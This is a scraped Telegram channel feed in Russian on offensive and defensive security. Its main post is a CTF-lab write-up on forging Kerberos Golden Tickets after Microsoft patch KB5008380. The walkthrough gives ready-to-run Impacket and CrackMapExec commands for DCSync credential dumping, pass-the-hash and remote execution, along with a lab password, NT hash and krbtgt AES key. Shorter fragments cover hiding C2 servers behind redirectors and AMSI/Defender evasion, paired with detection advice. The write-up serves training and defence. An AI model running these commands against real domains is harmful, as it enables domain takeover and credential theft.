Purple Chronicles
Автор канала: @cherepawwka Изучаем оборонительную и наступательную безопасность, решаем CTF, постигаем азы Web и многое другое😈 Ссылка на обсуждение: https://t.me/+Ey-SglltFUVmNjMy
Show more- Subscribers
- Post coverage
- ER - engagement ratio
Data loading in progress...
Data loading in progress...
Всем привет! Меня зовут Алексей, я работаю в компании «Визум», и занимаюсь тестированием на проникновение, направления классические – инфраструктура и веб. Данную статью меня сподвиг написать мой друг...
python3 ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain $DOMAIN randomuser
Но выпустив себе билет таким образом, при попытке его использования вы увидите следующую ошибку:
[-] Kerberos SessionError: KDC_ERR_TGT_REVOKED(TGT has been revoked)
О чем говорит эта ошибка? Билет был отозван? Но мы же только что его выпустили!
Вся причина в том, что кто-то не следит за патч-ноутами. С ноября 2021 года компания Microsoft начала распространять обновление KB5008380, которое вводилось в несколько этапов. Его целью была нейтрализация серьезной уязвимости CVE-2021-42287, которая позволяла атакующему без особых усилий олицетворять контроллеры домена, злоупотребляя Privilege Attribute Certificate (PAC) Kerberos🖼️
Для тех, кто не в теме:
Privilege Attribute Certificate (PAC) — это компонент, используемый в протоколе аутентификации Kerberos, который хранит дополнительную информацию об авторизации пользователя и прикрепляется к билету Kerberos, предоставляя подробную информацию о членстве пользователя в группах, привилегиях и других атрибутах, связанных с безопасностью.
Возвращаясь к патчу, Microsoft обновила PAC, добавив две новые структуры данных: PAC_ATTRIBUTES_INFO и PAC_REQUESTOR. Наиболее интересной частью патча является новая проверка, представленная структурой PAC_REQUESTOR. С её появлением KDC проверяет имя пользователя (клиента) в билете, который разрешается в SID, включенный в PAC. Поэтому с октября 2022 года любой билет без новой структуры PAC (или билет для несуществующего пользователя) будет отклонен. Естественно, если обновление установлено.
В этом и кроется суть ошибки, которую мы могли наблюдать выше.
Вместе с обновлением подход к созданию золотых билетов тоже изменился. Мы не можем выпустить Golden Ticket для произвольного пользователя, но можем воспользоваться существующим!
Для начала обновите Impacket!
apt install python3-impacket
После обновления выпустить золотой билет можно следующей командой:
python3 ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain $DOMAIN -user-id 1000 validuser
При этом обратная совместимость со старым PAC так же останется:
python3 ticketer.py -nthash $krbtgtRC4key -domain-sid $domainSID -domain $DOMAIN -old-pac username
Практический пример использования Golden Ticket на примере уже разобранной мной лабораторной Kingdom с платформы Codeby.Games:
# Получаем SID домена:
impacket-lookupsid codeby.cdb/administrator:'Not_alon3'@192.168.2.4
# Делаем DCSync, получаем ключи учетки krbtgt:
impacket-secretsdump codeby.cdb/administrator:'Not_alon3'@192.168.2.4 -just-dc-user krbtgt
# Осуществляем RID-брутфорс для получения пар RID+user (тут я внезапно использовал Pass-the-Hash):
crackmapexec smb 192.168.2.4 -u Administrator -H 3c3d0f466260c126a80abe255cdfffad --rid-brute
# Выпускаем золотой билет:
impacket-ticketer -aesKey
c8a4d26bcf29ff5cd29882308907b5536af9857de7cbfb4c1bf1cd789b3799d2 -domain-sid S-1-5-21-1870022127-3338747641-451296598 -domain codeby.cdb -user-id 1105 amaslova
# Добавляем запись в /etc/hosts, потому что Kerberos работает с именами служб:
echo '192.168.2.4 kingdom.codeby.cdb kingdom codeby.cdb' >> /etc/hosts
# Используем smbexec с созданным золотым билетом:
export KRB5CCNAME=amaslova.ccache
impacket-smbexec codeby.cdb/[email protected] -k -no-pass
Результат можно увидеть на приложенных к посту (ниже) скриншотах. На первом из них видна попытка выпустить билет на несуществующего пользователя, а на втором — успешное использование золотого билета, выпущенного для непривилегированной учетной записи amaslova
!Всем привет! Сегодня мы познакомимся с одним из методов сокрытия C2-сервера за промежуточным узлом, называемым C2 Redirector. Техника сокрытия позволит избежать быстрого обнаружения управляющего сервера вашей C2-инфраструктуы и позволит затруднить анализ вредоносного ПО с точки зрения сбора IOC синей команде.
wmiexec.py
из набора Impacket👩💻, даёт возможность уклонения от Windows Defender и предлагает модули по обходу AMSI, передаче файлов, удалённому включению RDP с конфигурацией брандмауэра и многое другое🛡
Красным командам советую взять на вооружение🛠
🔎 Но основной упор в статье сделан на детект инструмента как в сетевом трафике, так и в событиях журналов Windows и Sysmon 🔎
А все начиналось с whoami as a SYSTEM...
#пентест #блютим #DFIRВсем привет! Сегодня мы познакомимся с интересным инструментом wmiexec-Pro, расширяющим возможности wmiexec.py из набора Impacket, и научимся находить следы его использования в сетевом трафике и на хосте.